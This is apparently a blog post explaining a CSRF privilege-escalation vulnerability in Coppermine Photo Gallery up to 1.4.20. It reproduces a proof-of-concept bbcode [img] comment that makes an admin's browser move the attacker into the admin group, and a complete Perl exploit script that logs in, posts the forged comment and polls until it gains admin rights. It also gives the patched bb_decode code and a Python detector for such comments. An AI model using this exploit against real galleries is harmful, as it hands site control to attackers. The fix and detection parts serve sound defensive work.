Coppermine Photo Gallery (CPG), which is used as the gallery on this site, has also had vulnerabilities announced(?) one after another recently.
This is a CSRF (Cross-site request forgery) vulnerability, a type of web-site attack that is currently in fashion(?).
The CSRF attack uses the image-link feature of bbcode: once the real administrator logs in and a particular message is displayed,
administrator privileges are handed over to the attacker, which is a serious problem.
Since CPG is used far more overseas than in Korea, things seem quiet(?) domestically;
Source: http://www.milw0rm.com/exploits/8114
The red "" mark indicates a line break (a line that was wrapped for display).
+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it
| http://coppermine-gallery.net
| Don't add me on msn messenger.
| This vulnerability can be named as "bbcode img tag script injection"
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it)
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id.
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id]
+--------------------------------------------------------------------------+
Insert the below code into a new message
hey admin,nice web site :)
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site"
| You'll become admin when the real admin will visit the page
+-------------------------------------------------------------------------+
Right after the vulnerability was published, exploit code (perl) appeared as well.
Source: http://www.milw0rm.com/exploits/8115
The red "" mark indicates a line break (a line that was wrapped for display).
#!/usr/bin/perl
#inphex - inphex0 at gmail dot com
#based on http://milw0rm.com/exploits/8114 - found by StAkeR
#In case this does not work check out pos(Line 80) and find another value for it
use IO::Socket;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;
$_1 = shift; #[HOST]
$h = ($_1 eq ""?($n = 0):($n = 1));
$_2 = shift; #[PATH]
$_3 = shift; #[ID]
$_4 = shift; #[ALBUMNUM]
$_5 = shift; #[USER]
$_6 = shift; #[PASS]
$d_p = 80;
if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n";
print "perl coppermine host.com /path/ 3 2 inphex 123456";
exit;
}
if ($h) {
$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR");
print $socket "GET $_2 HTTP/1.1\n";
print $socket "Host: $_1\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>) {
$f_answer = $f_answer.$answer;
}
$url = &gen_url($_1,$_2,$_3);
if ($url) {
$code = &gen_code($url);
$res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
}
}
sub gen_url($$$) {
$h = shift;
$p = shift;
$i = shift;
$url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no";
return $url;
}
sub gen_code($) {
$url = shift;
$code = "yoyoyo[img]".$url."[/img]";
return $code;
}
sub _send($$$$$$$) {
$h = "http://".shift;
$p = shift;
$i = shift;
$aid = shift;
$co = shift;
$u = shift;
$pass = shift;
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
if($cookie_jar->as_string) {
$c = 1;
print "[+]Connected\n";
print "[+]Logged in\n";
}else {
$c = 0;
}
if ($c) {
$con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed
if ($con =~m/addfav\.php\?pid=(.*?)&/) {
$p_id = $1;
}
}
$se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
Content => [
'msg_author' => $u,
'msg_body' => $co,
'event' => 'comment',
'pid' => $p_id,
'submit' => "OK",
],);
print "[+]Comment sent\n";
print "[/]Waiting for admin to view\n";
$| = 0;
while (1) {
sleep(20);
syswrite STDOUT,"-";
$xpl1 = LWP::UserAgent->new() or die;
$cookie_jar1 = HTTP::Cookies->new();
$xpl1->cookie_jar( $cookie_jar1 );
$_con = get("".$h.$p."logout.php?referer=index.php");
$login = $xpl1->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
$const = $xpl1->get($h.$p."index.php");
if ($const->as_string =~m/Config/) {
print "\n[+]You just gained Admin Privileges";
exit;
}
}
}
How to fix the vulnerability:
Replace the bb_decode function in the file include/functions.inc.php with the new code.
See below for the changes.
// Allow the use of a limited set of phpBB bb codes in albums and image descriptions
// Based on phpBB code
/**
 * bb_decode()
 *
 * @param $text
 * @return
 **/
function bb_decode($text)
{
    $text = nl2br($text);
    static $bbcode_tpl = array();
    static $patterns = array();
    static $replacements = array();
    // First: If there isn't a "[" and a "]" in the message, don't bother.
    if ((strpos($text, "[") === false || strpos($text, "]") === false)) {
        return $text;
    }
    // [b] and [/b] for bolding text.
    $text = str_replace("[b]", '<b>', $text);
    $text = str_replace("[/b]", '</b>', $text);
    // [u] and [/u] for underlining text.
    $text = str_replace("[u]", '<u>', $text);
    $text = str_replace("[/u]", '</u>', $text);
    // [i] and [/i] for italicizing text.
    $text = str_replace("[i]", '<i>', $text);
    $text = str_replace("[/i]", '</i>', $text);
    // colors
    $text = preg_replace("/\[color=(#[0-9A-F]{6}|[a-z]+)\]/", '<span style="color:$1">', $text);
    $text = str_replace("[/color]", '</span>', $text);
    // [i] and [/i] for italicizing text.
    //$text = str_replace("[i:$uid]", $bbcode_tpl['i_open'], $text);
    //$text = str_replace("[/i:$uid]", $bbcode_tpl['i_close'], $text);
    if (!count($bbcode_tpl)) {
        // We do URLs in several different ways..
        // **** WARNING *******************************************************
        // The [url] tag can be used for a serious attack against your website.
        // So [url] tags are no longer processed to show links.
        // This simple action here is not an ideal solution but is necessary.
        // Now, [url] tags are processed as follows:
        // [url=link]text[/url] shows 'text' with a dummy image for the link.
        // [url]link[/url] shows 'link' as plain text with a dummy image.
        // The following line is the original line that processed [url]:
        // $bbcode_tpl['url'] = '<span class="bblink"><a href="{URL}" rel="external">{DESCRIPTION}</a></span>';
        // ********************************************************************
        // See this thread on the Coppermine forum for more information:
        // http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
        // Please read this thread carefully before deciding to process [url].
        // ********************************************************************
        $url_removed = '{URL}'; // put the link URL in the tooltip/mouse-over
        $bbcode_tpl['url'] = '{DESCRIPTION}<img src="images/descending.gif" alt="" title="' . $url_removed . '" />';
        $bbcode_tpl['email'] = '<span class="bblink"><a href="mailto:{EMAIL}">{EMAIL}</a></span>';
        $bbcode_tpl['url1'] = str_replace('{URL}', '\1\2', $bbcode_tpl['url']);
        $bbcode_tpl['url1'] = str_replace('{DESCRIPTION}', '\1\2', $bbcode_tpl['url1']);
        $bbcode_tpl['url2'] = str_replace('{URL}', 'http://\1', $bbcode_tpl['url']);
        $bbcode_tpl['url2'] = str_replace('{DESCRIPTION}', '\1', $bbcode_tpl['url2']);
        $bbcode_tpl['url3'] = str_replace('{URL}', '\1\2', $bbcode_tpl['url']);
        $bbcode_tpl['url3'] = str_replace('{DESCRIPTION}', '\3', $bbcode_tpl['url3']);
        $bbcode_tpl['url4'] = str_replace('{URL}', 'http://\1', $bbcode_tpl['url']);
        $bbcode_tpl['url4'] = str_replace('{DESCRIPTION}', '\2', $bbcode_tpl['url4']);
        $bbcode_tpl['email'] = str_replace('{EMAIL}', '\1', $bbcode_tpl['email']);
        // [url]xxxx://www.phpbb.com[/url] code..
        $patterns[1] = "#\[url\]([a-z]+?://){1}([a-z0-9\-\.,\?!%\*_\#:;~\\&$@\/=\+\(\)]+)\[/url\]#si";
        $replacements[1] = $bbcode_tpl['url1'];
        // [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
        $patterns[2] = "#\[url\]([a-z0-9\-\.,\?!%\*_\#:;~\\&$@\/=\+\(\)]+)\[/url\]#si";
        $replacements[2] = $bbcode_tpl['url2'];
        // [url=xxxx://www.phpbb.com]phpBB[/url] code..
        $patterns[3] = "#\[url=([a-z]+?://){1}([a-z0-9\-\.,\?!%\*_\#:;~\\&$@\/=\+\(\)]+)\](.*?)\[/url\]#si";
        $replacements[3] = $bbcode_tpl['url3'];
        // [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
        $patterns[4] = "#\[url=([a-z0-9\-\.,\?!%\*_\#:;~\\&$@\/=\+\(\)]+)\](.*?)\[/url\]#si";
        $replacements[4] = $bbcode_tpl['url4'];
        // [email]user@domain.tld[/email] code..
        $patterns[5] = "#\[email\]([a-z0-9\-_.]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+)\[/email\]#si";
        $replacements[5] = $bbcode_tpl['email'];
        // [img]xxxx://www.phpbb.com[/img] code..
        // **** WARNING *******************************************************
        // The [img] tag can be used for a serious attack against your website.
        // So [img] tags are no longer processed to show the specified images.
        // This simple action here is not an ideal solution but is necessary.
        // Now [img] tags will show a dummy image instead as a placeholder.
        // ********************************************************************
        // The following line is the original line that processed [img]:
        // $bbcode_tpl['img'] = '<img src="{URL}" alt="" />';
        // ********************************************************************
        // See this thread on the Coppermine forum for more information:
        // http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
        // Please read this thread carefully before deciding to process [img].
        // ********************************************************************
        $img_removed = '{URL}'; // put the image URL in the tooltip/mouse-over
        $bbcode_tpl['img'] = '<img src="images/thumbnails.gif" alt="" title="' . $img_removed . '" />';
        $bbcode_tpl['img'] = str_replace('{URL}', '\1\2', $bbcode_tpl['img']);
        $patterns[6] = "#\[img\]([a-z]+?://){1}([a-z0-9\-\.,\?!%\*_\#:;~\\&$@\/=\+\(\)]+)\[/img\]#si";
        $replacements[6] = $bbcode_tpl['img'];
    }
    $text = preg_replace($patterns, $replacements, $text);
    return $text;
}
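As an added example (not part of the original post or of Coppermine's own code), the [img] change above ported to Python so the before/after output can be compared directly, plus a check a gallery admin can run over comments stored before the patch was applied; the hostnames and comment ids are constructed:

```python
import html
import re
from urllib.parse import urlsplit

# Templates quoted from the page: the original Coppermine [img] template and the patched one.
# With the original, the commenter's URL becomes the src of a real <img>, so every viewer's
# browser (an admin's included) issues a GET to it carrying that viewer's session cookies.
# The patch fetches a static placeholder and keeps the URL only in title, which is never requested.
VULNERABLE_IMG_TPL = '<img src="{URL}" alt="" />'
HARDENED_IMG_TPL = '<img src="images/thumbnails.gif" alt="" title="{URL}" />'

# Same [img] pattern as $patterns[6] in the fix; the character class admits no quotes or angle
# brackets, so the URL cannot break out of the attribute (html.escape below is belt-and-braces).
IMG_RE = re.compile(r'\[img\]([a-z]+?://)([a-z0-9\-.,?!%*_#:;~\\&$@/=+()]+)\[/img\]', re.I)


def bb_decode_img(text, hardened=True):
    """Render [img] tags the way bb_decode does before (hardened=False) or after the fix."""
    tpl = HARDENED_IMG_TPL if hardened else VULNERABLE_IMG_TPL
    return IMG_RE.sub(
        lambda m: tpl.replace('{URL}', html.escape(m.group(1) + m.group(2), quote=True)), text)


def find_suspicious_img_tags(comments, gallery_host):
    """Return (comment_id, url) for [img] URLs that point at a PHP script on the gallery's own host.

    A genuine embed points at an image file; a URL to one of the gallery's own scripts
    (delete.php?...&action=change_group in the PoC) is a forged request that runs with the
    session of whoever views the page.
    """
    hits = []
    for comment_id, body in comments:
        for m in IMG_RE.finditer(body):
            url = m.group(1) + m.group(2)
            parts = urlsplit(url)
            if (parts.hostname or '').lower() == gallery_host.lower() and parts.path.lower().endswith('.php'):
                hits.append((comment_id, url))
    return hits


# Constructed sample comments; hostnames and ids are made up for this example.
SAMPLE_COMMENTS = [
    (1, 'great shot! [img]http://img.example.test/pics/cat.jpg[/img]'),
    (2, 'hey admin,nice web site :) [img]http://gallery.example.test/cpg/'
        'delete.php?id=u3&u3=&action=change_group&group=1[/img]'),
    (3, 'no bbcode here'),
]

if __name__ == '__main__':
    for cid, body in SAMPLE_COMMENTS:
        print(cid, bb_decode_img(body))
    print(find_suspicious_img_tags(SAMPLE_COMMENTS, 'gallery.example.test'))
```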
Related links:
http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
http://www.milw0rm.com/exploits/8114
http://www.milw0rm.com/exploits/8115